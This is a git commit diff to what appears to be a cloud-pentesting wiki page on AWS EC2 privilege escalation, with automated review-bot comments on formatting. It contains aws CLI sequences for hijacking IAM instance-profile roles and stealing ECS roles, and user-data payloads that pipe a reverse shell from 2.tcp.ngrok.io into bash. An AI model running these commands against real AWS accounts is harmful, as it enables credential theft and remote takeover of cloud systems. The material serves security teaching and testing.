GITBOOK-472: change request with no subject merged in GitBook
carlospolop authored and gitbook-bot committed Oct 16, 2023
1 parent 554d2b9 commit f1ed553
Showing 2 changed files with 20 additions and 6 deletions.
Expand Up @@ -56,6 +56,7 @@ An important note to make about this attack is that an **obvious indicator of co

With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.

{% code overflow="wrap" %}
```bash
aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
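Review bot: the context line `will be **run** in inside the **EC2 instance**` has a doubled preposition; suggest `will be **run** inside the **EC2 instance**`. Also confirm that the `{% code overflow="wrap" %}` opened at the top of this hunk is paired with the `{% endcode %}` that appears in the next hunk, since the wrapper and its close are split across two hunks here.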
Expand All @@ -70,6 +71,7 @@ aws ec2 run-instances \
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
```
{% endcode %}

To learn how to **force ECS services to be run** in this new EC2 instance check:

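Review bot: the user-data line `echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config` will not run as written, because an unquoted `<cluster-name>` is parsed by the shell as redirection operators rather than as text; either quote it (`echo 'ECS_CLUSTER=<cluster-name>'`) or state in the text that the placeholder must be substituted before the script is used. The second statement, `echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config`, writes an empty value with no explanation; a short comment on why it is set would help readers.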
Expand All @@ -84,31 +86,39 @@ If you **cannot create a new instance** but has the permission `ecs:RegisterCont
### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**

Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), he will also need **`iam:RemoveRoleFromInstanceProfil`**`e`.
As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.

{% code overflow="wrap" %}
```bash
# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>

# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
```
{% endcode %}

If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**

* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`)
* ```
* {% code overflow="wrap" %}
```bash
aws ec2 associate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
```
{% endcode %}
* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it
* ```
* {% code overflow="wrap" %}
```bash
aws ec2 disassociate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
```
{% endcode %}
* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`).
* ```
* {% code overflow="wrap" %}
```bash
aws ec2 replace-iam-instance-profile-association --iam-instance-profile <value> --association-id <value>
```
{% endcode %}

**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).

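Review bot: the ```bash fences and `{% endcode %}` lines that now follow each `* {% code overflow="wrap" %}` bullet are not indented under their bullets, so renderers that honour list indentation will close the list before the code and show the three commands outside their items; indenting the fence, the command lines and `{% endcode %}` by the bullet's width keeps each block attached to its bullet. Two smaller points in the same region: the `iam:RemoveRoleFromInstanceProfile` fix switches from `he` to `you`, while the surrounding sentences (`so he could steal`, `He could **find**`) still use `he`, and `a compromised i**nstance:**` opens the bold span in the middle of the word.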
Expand All @@ -117,6 +127,7 @@ If the **instance profile has a role** and the attacker **cannot remove it**, th
An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
Once the instance is run, he can **steal the IAM role**.

{% code overflow="wrap" %}
```bash
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
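Review bot: the bold span `**`ec2:RequestSpotInstances`and`iam:PassRole`**` is missing spaces around `and`, so the two permissions render as one run-together token; suggest `**`ec2:RequestSpotInstances`** and **`iam:PassRole`**`. The user-data snippet also hard-codes a specific public endpoint (`2.tcp.ngrok.io:14510`) that will be stale for readers; a `<host>:<port>` placeholder matches the `<value>` convention used elsewhere in this file.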
Expand All @@ -126,6 +137,7 @@ aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
```
{% endcode %}

### `ec2:ModifyInstanceAttribute`

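Review bot: `$REV` is interpolated directly into the double-quoted `--launch-specification` JSON, so any `"` or newline in its value breaks the document; the `printf` at the start of the previous hunk suggests the value is encoded before use, but the lines in between are collapsed in this view, so confirm the encoding step is present and mention it in the prose. The specification also hard-codes `EC2-CloudWatch-Agent-Role` and `ami-0c1bc246476a5572b`, which should be `<value>` placeholders like the rest of the file.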
Expand Down Expand Up @@ -176,6 +188,7 @@ aws ec2 start-instances --instance-ids $INSTANCE_ID

An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.

{% code overflow="wrap" %}
```bash
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
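Review bot: the bold span `**`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`**` is missing spaces after the comma and around `and`, and `Launch Templat**e` closes the bold one character early. Since the paragraph itself states that the technique only affects Auto Scaling groups configured to use the latest or default template version, a one-line mitigation (pin the group to a specific version number) would make the section useful to defenders as well.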
Expand All @@ -189,6 +202,7 @@ aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2
```
{% endcode %}

**Potential Impact:** Direct privesc to a different EC2 role.

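Review bot: `--default-version 2` assumes the template had exactly one version before the new one was created; the text should say that `2` is an example value to be replaced with the version number actually created, in line with the placeholders used elsewhere in the file.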
Expand Down Expand Up @@ -237,6 +251,7 @@ An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPubl
In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
{% code overflow="wrap" %}
```bash
aws ec2 enable-serial-console-access
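Review bot: the added `{% code overflow="wrap" %}` sits directly under the sentence `In order to connect to the serial port you also **need to know the username and password of a user**...` with no blank line between them, unlike the other blocks in this commit, which separate the wrapper from the preceding paragraph; add the blank line so the paragraph and the code block render as distinct units.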
Expand All @@ -248,6 +263,7 @@ aws ec2-instance-connect send-serial-console-ssh-public-key \
ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
```
{% endcode %}
This way isn't that useful to privesc as you need to know a username and password to exploit it.

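Review bot: the added `{% endcode %}` runs straight into the next paragraph (`This way isn't that useful to privesc...`) with no blank line, mirroring the spacing issue at the start of this block; add the blank line. That sentence would also read better as `This method isn't very useful for privesc, as you need to know a username and password to exploit it.`, and the `ssh` line hard-codes `eu-west-1` in the serial-console endpoint, which is worth calling out as region-specific.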
Expand Up @@ -220,8 +220,6 @@ Techniques like SSM message interception can be found in the SSM post-exploitati

**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.

<figure><img src="https://lh6.googleusercontent.com/cRBL0xfhe4VRn6PU0Bs_NPx937HqgdYxYNkRAh0WmQFfVZfyYg6X1rhpJwmVIQXIEeepQcUoJipsdH-qmacm8Dw49H539e2ygb2A5hQWGjMh_SAEHOfhygtTLINR2h5l6p4NiiMMO7g0LTZiFpdBB9IeEA=s2048" alt=""><figcaption></figcaption></figure>

### Enumeration

```bash
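Review bot: the removed figure had an empty `alt` and an empty `<figcaption>`, so dropping it loses no information, but the commit message (`change request with no subject`) gives no reason for the removal; a one-line subject noting that the ELB diagram was an externally hosted image with no caption would make the history useful.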